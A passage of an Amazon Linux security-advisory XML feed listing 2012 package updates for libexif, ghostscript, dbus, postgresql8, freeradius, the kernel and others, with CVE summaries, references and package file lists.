21:36:00" /><updated date="2014-09-14 17:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2841:
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Integer underflow in the exif_entry_get_value function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) 0.6.20 might allow remote attackers to execute arbitrary code via vectors involving a crafted buffer-size parameter during the formatting of an EXIF tag, leading to a heap-based buffer overflow.
839189:
CVE-2012-2841 libexif: "exif_entry_get_value()" integer underflow
CVE-2012-2840:
Off-by-one error in the exif_convert_utf16_to_utf8 function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service or possibly execute arbitrary code via crafted EXIF tags in an image.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839188:
CVE-2012-2840 libexif: "exif_convert_utf16_to_utf8()" off-by-one
CVE-2012-2837:
The mnote_olympus_entry_get_value function in olympus/mnote-olympus-entry.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service (divide-by-zero error) via an image with crafted EXIF tags that are not properly handled during the formatting of EXIF maker note tags.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839185:
CVE-2012-2837 libexif: "mnote_olympus_entry_get_value()" division by zero
CVE-2012-2836:
The exif_data_load_data function in exif-data.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from process memory via crafted EXIF tags in an image.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839184:
CVE-2012-2836 libexif: "exif_data_load_data()" heap-based out-of-bounds array read
CVE-2012-2814:
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Buffer overflow in the exif_entry_format_value function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) 0.6.20 allows remote attackers to cause a denial of service or possibly execute arbitrary code via crafted EXIF tags in an image.
839183:
CVE-2012-2814 libexif: "exif_entry_format_value()" buffer overflow
CVE-2012-2813:
The exif_convert_utf16_to_utf8 function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from process memory via crafted EXIF tags in an image.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839182:
CVE-2012-2813 libexif: "exif_convert_utf16_to_utf8()" heap-based out-of-bounds array read
CVE-2012-2812:
The exif_entry_get_value function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from process memory via crafted EXIF tags in an image.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839203:
CVE-2012-2812 libexif: "exif_entry_get_value()" heap-based out-of-bounds array read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2812" title="" id="CVE-2012-2812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2813" title="" id="CVE-2012-2813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2814" title="" id="CVE-2012-2814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2836" title="" id="CVE-2012-2836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2837" title="" id="CVE-2012-2837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2840" title="" id="CVE-2012-2840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2841" title="" id="CVE-2012-2841" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1255.html" title="" id="RHSA-2012:1255" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libexif-debuginfo" version="0.6.21" release="5.6.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-debuginfo-0.6.21-5.6.amzn1.i686.rpm</filename></package><package name="libexif" version="0.6.21" release="5.6.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-0.6.21-5.6.amzn1.i686.rpm</filename></package><package name="libexif-devel" version="0.6.21" release="5.6.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-devel-0.6.21-5.6.amzn1.i686.rpm</filename></package><package name="libexif-devel" version="0.6.21" release="5.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-devel-0.6.21-5.6.amzn1.x86_64.rpm</filename></package><package name="libexif" version="0.6.21" release="5.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-0.6.21-5.6.amzn1.x86_64.rpm</filename></package><package name="libexif-debuginfo" version="0.6.21" release="5.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-debuginfo-0.6.21-5.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-127</id><title>Amazon Linux - ALAS-2012-127: medium priority package update for ghostscript</title><issued date="2012-09-22 21:37:00" /><updated date="2014-09-14 17:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4405:
Multiple integer underflows in the icmLut_allocate function in International Color Consortium (ICC) Format library (icclib), as used in Ghostscript 9.06 and Argyll Color Management System, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted (1) PostScript or (2) PDF file with embedded images, which triggers a heap-based buffer overflow. NOTE: this issue is also described as an array index error.
An integer overflow flaw, leading to a heap-based buffer overflow, was found in Ghostscript's International Color Consortium Format library (icclib). An attacker could create a specially-crafted PostScript or PDF file with embedded images that would cause Ghostscript to crash or, potentially, execute arbitrary code with the privileges of the user running Ghostscript.
854227:
CVE-2012-4405 ghostscript, argyllcms: Array index error leading to heap-based bufer OOB write
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4405" title="" id="CVE-2012-4405" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1256.html" title="" id="RHSA-2012:1256" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ghostscript-doc" version="8.70" release="15.22.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-15.22.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="15.22.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-15.22.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="15.22.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-15.22.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="15.22.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-15.22.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="15.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-15.22.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="15.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-15.22.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="15.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-15.22.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="15.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-15.22.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-128</id><title>Amazon Linux - ALAS-2012-128: medium priority package update for dbus</title><issued date="2012-09-22 21:37:00" /><updated date="2014-09-14 17:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3524:
libdbus 1.5.x and earlier, when used in setuid or other privileged programs in X.org and possibly other products, allows local users to gain privileges and execute arbitrary code via the DBUS_SYSTEM_BUS_ADDRESS environment variable. NOTE: libdbus maintainers state that this is a vulnerability in the applications that do not cleanse environment variables, not in libdbus itself: "we do not support use of libdbus in setuid binaries that do not sanitize their environment before their first call into libdbus."
It was discovered that the D-Bus library honored environment settings even when running with elevated privileges. A local attacker could possibly use this flaw to escalate their privileges, by setting specific environment variables before running a setuid or setgid application linked against the D-Bus library (libdbus).
847402:
CVE-2012-3524 dbus: privilege escalation when libdbus is used in setuid/setgid application
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3524" title="" id="CVE-2012-3524" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1261.html" title="" id="RHSA-2012:1261" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="dbus-libs" version="1.2.24" release="7.16.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-libs-1.2.24-7.16.amzn1.i686.rpm</filename></package><package name="dbus-debuginfo" version="1.2.24" release="7.16.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-debuginfo-1.2.24-7.16.amzn1.i686.rpm</filename></package><package name="dbus" version="1.2.24" release="7.16.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-1.2.24-7.16.amzn1.i686.rpm</filename></package><package name="dbus-devel" version="1.2.24" release="7.16.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-devel-1.2.24-7.16.amzn1.i686.rpm</filename></package><package name="dbus-doc" version="1.2.24" release="7.16.amzn1" epoch="1" arch="noarch"><filename>Packages/dbus-doc-1.2.24-7.16.amzn1.noarch.rpm</filename></package><package name="dbus" version="1.2.24" release="7.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-1.2.24-7.16.amzn1.x86_64.rpm</filename></package><package name="dbus-devel" version="1.2.24" release="7.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-devel-1.2.24-7.16.amzn1.x86_64.rpm</filename></package><package name="dbus-libs" version="1.2.24" release="7.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-libs-1.2.24-7.16.amzn1.x86_64.rpm</filename></package><package name="dbus-debuginfo" version="1.2.24" release="7.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-debuginfo-1.2.24-7.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-129</id><title>Amazon Linux - ALAS-2012-129: medium priority package update for postgresql8</title><issued date="2012-09-22 21:38:00" /><updated date="2014-09-14 17:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3489:
It was found that the "xml" data type allowed local files and remote URLs to be read with the privileges of the database server to resolve DTD and entity references in the provided XML. An unprivileged database user could use this flaw to read local files they would otherwise not have access to by issuing a specially-crafted SQL query. Note that the full contents of the files were not returned, but portions could be displayed to the user via error messages.
849173:
CVE-2012-3489 postgresql: File disclosure through XXE in xmlparse by DTD validation
CVE-2012-3488:
It was found that the optional PostgreSQL xml2 contrib module allowed local files and remote URLs to be read and written to with the privileges of the database server when parsing Extensible Stylesheet Language Transformations (XSLT). An unprivileged database user could use this flaw to read and write to local files (such as the database's configuration files) and remote URLs they would otherwise not have access to by issuing a specially-crafted SQL query.
849172:
CVE-2012-3488 postgresql (xml2 contrib module): XXE by applying XSL stylesheet to the document
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3488" title="" id="CVE-2012-3488" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3489" title="" id="CVE-2012-3489" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1263.html" title="" id="RHSA-2012:1263" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql8-debuginfo" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.13" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.13-1.37.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.13-1.37.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.13" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.13-1.37.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-130</id><title>Amazon Linux - ALAS-2012-130: medium priority package update for munin</title><issued date="2012-10-08 10:39:00" /><updated date="2014-09-14 17:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3512:
849830:
CVE-2012-3512 munin: insecure state file handling, munin-&gt;root privilege
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3512" title="" id="CVE-2012-3512" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="munin-common" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-common-2.0.6-2.9.amzn1.noarch.rpm</filename></package><package name="munin-async" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-async-2.0.6-2.9.amzn1.noarch.rpm</filename></package><package name="munin" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-2.0.6-2.9.amzn1.noarch.rpm</filename></package><package name="munin-node" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-node-2.0.6-2.9.amzn1.noarch.rpm</filename></package><package name="munin-java-plugins" version="2.0.6" release="2.9.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-java-plugins-2.0.6-2.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-131</id><title>Amazon Linux - ALAS-2012-131: medium priority package update for freeradius</title><issued date="2012-10-08 10:40:00" /><updated date="2014-09-14 17:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3547:
Stack-based buffer overflow in the cbtls_verify function in FreeRADIUS 2.1.10 through 2.1.12, when using TLS-based EAP methods, allows remote attackers to cause a denial of service (server crash) and possibly execute arbitrary code via a long "not after" timestamp in a client certificate.
A buffer overflow flaw was discovered in the way radiusd handled the expiration date field in X.509 client certificates. A remote attacker could possibly use this flaw to crash radiusd if it were configured to use the certificate or TLS tunnelled authentication methods (such as EAP-TLS, EAP-TTLS, and PEAP).
852752:
CVE-2012-3547 freeradius: stack-based buffer overflow via long expiration date fields in client X509 certificates
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3547" title="" id="CVE-2012-3547" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1326.html" title="" id="RHSA-2012:1326" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="freeradius-perl" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-perl-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-utils" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-utils-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-ldap" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-ldap-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-unixODBC" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-unixODBC-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-postgresql-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-python" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-python-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-mysql" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-mysql-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-krb5" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-krb5-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-debuginfo" version="2.1.12" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-debuginfo-2.1.12-4.11.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-postgresql-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-mysql-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-ldap" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-ldap-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-debuginfo-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-unixODBC" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-unixODBC-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-utils" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-utils-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-perl" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-perl-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-krb5" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-krb5-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius-python" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-python-2.1.12-4.11.amzn1.x86_64.rpm</filename></package><package name="freeradius" version="2.1.12" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-2.1.12-4.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-132</id><title>Amazon Linux - ALAS-2012-132: low priority package update for fetchmail</title><issued date="2012-10-08 10:41:00" /><updated date="2014-09-14 17:08:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3482:
847988:
CVE-2012-3482 fetchmail: DoS (crash) in the base64 decoder upon server NTLM protocol exchange abort right after the initial request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3482" title="" id="CVE-2012-3482" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="fetchmail" version="6.3.17" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/fetchmail-6.3.17-1.9.amzn1.i686.rpm</filename></package><package name="fetchmail-debuginfo" version="6.3.17" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/fetchmail-debuginfo-6.3.17-1.9.amzn1.i686.rpm</filename></package><package name="fetchmail-debuginfo" version="6.3.17" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/fetchmail-debuginfo-6.3.17-1.9.amzn1.x86_64.rpm</filename></package><package name="fetchmail" version="6.3.17" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/fetchmail-6.3.17-1.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-133</id><title>Amazon Linux - ALAS-2012-133: medium priority package update for kernel</title><issued date="2012-10-08 10:43:00" /><updated date="2014-09-14 17:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3552:
Race condition in the IP implementation in the Linux kernel before 3.0 might allow remote attackers to cause a denial of service (slab corruption and system crash) by sending packets to an application that sets socket options during the handling of network traffic.
853465:
CVE-2012-3552 kernel: net: slab corruption due to improper synchronization around inet-&gt;opt
* A race condition was found in the way access to inet->opt ip_options was synchronized in the Linux kernel's TCP/IP protocol suite implementation. Depending on the network facing applications running on the system, a remote attacker could possibly trigger this flaw to cause a denial of service. A local, unprivileged user could use this flaw to cause a denial of service regardless of the applications the system runs.
* A race condition in the way access to inet->opt ip_options was synchronized in the Linux kernel's TCP/IP protocol suite implementation. Depending on the network facing applications running on the system, a remote attacker could possibly trigger this flaw to cause a denial of service. A local, unprivileged user could use this flaw to cause a denial of service regardless of the applications the system runs.
CVE-2012-3430:
820039:
CVE-2012-3430 kernel: recv{from,msg}() on an rds socket can leak kernel memory
* A flaw was found in the way the msg_namelen variable in the rds_recvmsg() function of the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation was initialized. A local, unprivileged user could use this flaw to leak kernel stack memory to user-space.
CVE-2012-2390:
Memory leak in mm/hugetlb.c in the Linux kernel before 3.4.2 allows local users to cause a denial of service (memory consumption or system crash) via invalid MAP_HUGETLB mmap operations.
824345:
CVE-2012-2390 kernel: huge pages: memory leak on mmap failure
* A memory leak flaw was found in the way the Linux kernel's memory subsystem handled resource clean up in the mmap() failure path when the MAP_HUGETLB flag was set. A local, unprivileged user could use this flaw to cause a denial of service.
CVE-2012-2384:
Integer overflow in the i915_gem_do_execbuffer function in drivers/gpu/drm/i915/i915_gem_execbuffer.c in the Direct Rendering Manager (DRM) subsystem in the Linux kernel before 3.3.5 on 32-bit platforms allows local users to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via a crafted ioctl call.
824178:
CVE-2012-2384 kernel: drm/i915: integer overflow in i915_gem_do_execbuffer()
* An integer overflow flaw was found in the i915_gem_do_execbuffer() function in the Intel i915 driver in the Linux kernel. A local, unprivileged user could use this flaw to cause a denial of service. This issue only affected 32-bit systems.
CVE-2012-2313:
The rio_ioctl function in drivers/net/ethernet/dlink/dl2k.c in the Linux kernel before 3.3.7 does not restrict access to the SIOCSMIIREG command, which allows local users to write data to an Ethernet adapter via an ioctl call.
818820:
CVE-2012-2313 kernel: unfiltered netdev rio_ioctl access by users
* A flaw was found in the way the Linux kernel's dl2k driver, used by certain D-Link Gigabit Ethernet adapters, restricted IOCTLs. A local, unprivileged user could use this flaw to issue potentially harmful IOCTLs, which could cause Ethernet adapters using the dl2k driver to malfunction (for example, losing network connectivity).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2313" title="" id="CVE-2012-2313" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2384" title="" id="CVE-2012-2384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2390" title="" id="CVE-2012-2390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3430" title="" id="CVE-2012-3430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3552" title="" id="CVE-2012-3552" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1304.html" title="" id="RHSA-2012:1304" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.30" release="49.59.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.30-49.59.amzn1.noarch.rpm</filename></package><package name="kernel-tools" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.30" release="49.59.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.30-49.59.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.30" release="49.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.30-49.59.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.30" release="49.59.amzn1" epoch="0" 